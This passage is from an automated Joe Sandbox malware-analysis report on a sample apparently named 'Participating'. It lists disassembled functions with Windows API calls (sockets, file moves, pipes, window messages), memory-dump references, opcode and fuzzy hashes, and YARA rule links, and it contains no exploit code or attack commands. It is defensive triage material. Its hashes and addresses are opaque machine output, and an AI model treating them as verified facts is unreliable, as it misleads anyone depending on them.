                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                  • Opcode ID: 49842e4551a838d1922ac44736c4510186114feda5dc9871b50ff51c45f4f98f
                                                                                                                                                                                                                                                                  • Instruction ID: c76a843c873edde29e26d909648dc39ad09f43c1bb61d91fa99b5f7d610c24eb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49842e4551a838d1922ac44736c4510186114feda5dc9871b50ff51c45f4f98f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E414F34A003189BCB10DF68C885B9EBBA9EF49354F188155E819AB3D2D731DA15CBB2
                                                                                                                                                                                                                                                                  Function 00D61B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D63AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00D63AD7
                                                                                                                                                                                                                                                                    • Part of subcall function 00D63AAB: _wcslen.LIBCMT ref: 00D63AF8
                                                                                                                                                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00D61B6F
                                                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00D61B7E
                                                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00D61C26
                                                                                                                                                                                                                                                                  • closesocket.WSOCK32(00000000), ref: 00D61C56
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8e8ace72e24a76a59d30280e42e47211a61e149aa965fc4582d93edacb0a7470
                                                                                                                                                                                                                                                                  • Instruction ID: ea7072cda2f1efd6ec7ea1d001768c803684ee90b92b9ae3fd978d9a44fdbf67
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e8ace72e24a76a59d30280e42e47211a61e149aa965fc4582d93edacb0a7470
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB41D235600214AFDB109F28C885BADBBEAEF45324F188059F8499B292D770ED81CBF1
                                                                                                                                                                                                                                                                  Function 00D4D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D4D7CD,?), ref: 00D4E714
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D4D7CD,?), ref: 00D4E72D
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00D4D7F0
                                                                                                                                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00D4D82A
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4D8B0
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4D8C6
                                                                                                                                                                                                                                                                  • SHFileOperationW.SHELL32(?), ref: 00D4D90C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                                                                                                                  • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                  • Opcode ID: 2291d71925249a0ed8ec01c81b6392224ced8e7c48f3411298b570ebad41cd83
                                                                                                                                                                                                                                                                  • Instruction ID: 64719d3c1aaac1dd8cce2ae19959196ee8e2a6dba1e42245b33348983ea32a36
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2291d71925249a0ed8ec01c81b6392224ced8e7c48f3411298b570ebad41cd83
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 424156719052189FDF12EFA4D985BEE77B9EF08340F1404E6A509EB141EB35A788CB70
                                                                                                                                                                                                                                                                  Function 00D73899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D738B8
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00D738EB
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00D73920
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D73952
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D7397C
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00D7398D
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D739A7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                  • Opcode ID: 468a91e01277d83c00e6ac927b9416a037d9d4bc72b2d1a712e19204f08e3f99
                                                                                                                                                                                                                                                                  • Instruction ID: b9c6bdda95d256371dcf9c1db6beef72511fb132c1ec42272faf7412b5f779f0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 468a91e01277d83c00e6ac927b9416a037d9d4bc72b2d1a712e19204f08e3f99
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D313431644255EFDB258F48DC85F6837A1FB8A710F1942A4F619CB2B1EB70AD84EF21
                                                                                                                                                                                                                                                                  Function 00D4808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D480D0
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D480F6
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00D480F9
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00D48117
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00D48120
                                                                                                                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00D48145
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00D48153
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7cfaa38fc3946f0edac08d750a94389af488a18b9bfe74feb0f8802f33864f85
                                                                                                                                                                                                                                                                  • Instruction ID: 25ec6bc7211fe126349658a1de31c6b85457b0575b5ada244c9d0af30582fe35
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7cfaa38fc3946f0edac08d750a94389af488a18b9bfe74feb0f8802f33864f85
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF217472600319AFDF109BA8CC84DAE77ADEF093647448426F919DB290DA70DC869770
                                                                                                                                                                                                                                                                  Function 00D48164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D481A9
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D481CF
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00D481D2
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32 ref: 00D481F3
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32 ref: 00D481FC
                                                                                                                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00D48216
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00D48224
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                  • Opcode ID: 35ad830419d1a9bac05eb089d28e4eb1037b562af0106518f838e771a2b7ca6f
                                                                                                                                                                                                                                                                  • Instruction ID: 3fa6ba6081a20c70d2c41bf857311e8cb3a407f81300a3787b3046cc070aac68
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35ad830419d1a9bac05eb089d28e4eb1037b562af0106518f838e771a2b7ca6f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24217475604704BFDB109BA8DC89DAE77ECEF093647448125F909CB2A1EA70EC81D774
                                                                                                                                                                                                                                                                  Function 00D50E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00D50E99
                                                                                                                                                                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00D50ED5
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                  • String ID: nul
                                                                                                                                                                                                                                                                  • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                  • Opcode ID: 2d1e8107116b1c3bf4b052d56e1d403cfc3b2bdb38d3d160318a55ff0d93a00a
                                                                                                                                                                                                                                                                  • Instruction ID: eb0996c772765535d15b795803d4ae039657de653949cc5685aa8aedaa89de72
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d1e8107116b1c3bf4b052d56e1d403cfc3b2bdb38d3d160318a55ff0d93a00a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94213D7050030AABDF208F25DC05A9A7BB9BF55721F244A59FCA5E72D0E770D949CB70
                                                                                                                                                                                                                                                                  Function 00D50F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00D50F6D
                                                                                                                                                                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00D50FA8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                  • String ID: nul
                                                                                                                                                                                                                                                                  • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                  • Opcode ID: 27fb9bbe6b0f09c3642e6f4297f99dd7ac0bc9aca652e2e4af5832da77017637
                                                                                                                                                                                                                                                                  • Instruction ID: c1ed5dcbd57cb420e9f723504f5978193a052276e1b4e30b1ed45590f84e8b7c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27fb9bbe6b0f09c3642e6f4297f99dd7ac0bc9aca652e2e4af5832da77017637
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD217F755403459BDF208F688C04A9A7BB8BF55722F240A19FCA1E32D4E770D989DB70
                                                                                                                                                                                                                                                                  Function 00D74B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00CE78B1
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE7873: GetStockObject.GDI32(00000011), ref: 00CE78C5
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CE78CF
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00D74BB0
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00D74BBD
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00D74BC8
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00D74BD7
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00D74BE3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                  • Opcode ID: 12f05047f39cee27e325ab7bcbe156cd44267492a1bf90af131b32eb4fabcb01
                                                                                                                                                                                                                                                                  • Instruction ID: a9c08df20daf61bb651b39bdc604539a15f51605cd27d490d4dbfca334031a77
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12f05047f39cee27e325ab7bcbe156cd44267492a1bf90af131b32eb4fabcb01
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 251193B2140219BEEF119E65CC85EE77FADEF08758F018110BA08E2090DB72DC219BB0
                                                                                                                                                                                                                                                                  Function 00D1DB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D1DB23: _free.LIBCMT ref: 00D1DB4C
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DBAD
                                                                                                                                                                                                                                                                    • Part of subcall function 00D12D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00D1DB51,00DB1DC4,00000000,00DB1DC4,00000000,?,00D1DB78,00DB1DC4,00000007,00DB1DC4,?,00D1DF75,00DB1DC4), ref: 00D12D4E
                                                                                                                                                                                                                                                                    • Part of subcall function 00D12D38: GetLastError.KERNEL32(00DB1DC4,?,00D1DB51,00DB1DC4,00000000,00DB1DC4,00000000,?,00D1DB78,00DB1DC4,00000007,00DB1DC4,?,00D1DF75,00DB1DC4,00DB1DC4), ref: 00D12D60
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DBB8
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DBC3
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DC17
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DC22
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DC2D
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DC38
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                  • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                  • Instruction ID: f205760be3b05750190d1b9f9edd8dccbd4957dc35df12aa67fc36f8cfe0b4e8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB1151B2546B04BAD520BBB0ED07FDB77EDDF04700F410C19B2AAAA152DF75B69486B0
                                                                                                                                                                                                                                                                  Function 00D4E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00D4E328
                                                                                                                                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00D4E32F
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00D4E345
                                                                                                                                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00D4E34C
                                                                                                                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D4E390
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00D4E36D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                  • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                  • Opcode ID: 42b6526754134e3d1e2735a5565459346abf6caa5ade1319675a5427d742606a
                                                                                                                                                                                                                                                                  • Instruction ID: 75574174450361fbed0edf7fedb880052f1f8493708c71770a1e0d68f612957b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42b6526754134e3d1e2735a5565459346abf6caa5ade1319675a5427d742606a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69016DF29003087FE711ABA48D89EEA777CEB08301F404595B74AE6141FA749E848B71
                                                                                                                                                                                                                                                                  Function 00D51312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
